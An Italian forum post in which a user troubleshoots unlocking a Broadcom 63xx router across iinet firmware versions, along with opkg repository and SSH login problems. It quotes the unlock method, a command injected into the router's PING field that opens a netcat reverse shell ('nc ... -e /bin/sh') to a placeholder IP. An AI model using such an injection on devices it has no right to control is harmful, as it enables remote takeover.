Allora ragazzi piccolo problema. Stavo provando a far funzionare opkg ma mi dava un po' di problemi, all'inizio non trovava i repositiry perchè hanno cambiato indirizzo poi nonostante l'abbia configurati con i reposity giusti mi diceva che i pacchetti non erano per quell'architettura(Brmc63xx), quindi ho provato a passare alla versione 3 di iinet ma qua sono arrivati i problemi grossi. Ho provato la procedura di sblocco ma una volta inserito nel campo PING la stringa ":::::::;nc a.b.c.d 1337 -e /bin/sh"(naturalmente sostituivo a.b.c.d. con il mio ip) mi dava l'errore "Invalid IP address Label within domain name has invalid syntax", pensando fosse problema di versione ho flashato tutto e sono tornato alla 2.2.1, carico la vecchia configurazione e provo a sbloccarlo ma stesso errore di prima. Non capisco dove possa essere l'errore, la prima volta andò tutto liscio.
P.S.Con la versione 3 quando provavo con Putty a collegarmi mi diceva connessione rifiutata mentre ora con la versione 2.2.1 mi fa inserire user e pass ma mi da Accesso negato, password sbagliata.
P.P.S. è possibile recuperare il firmware tiscali?
EDIT: Risolto il problema dell'accesso SSH facendo un downgrade alla 2.0.5 e poi di nuovo un upgrade alla 2.2.1. Ora cerco di trovare dei repository per opkg che non diano problemi di architettura.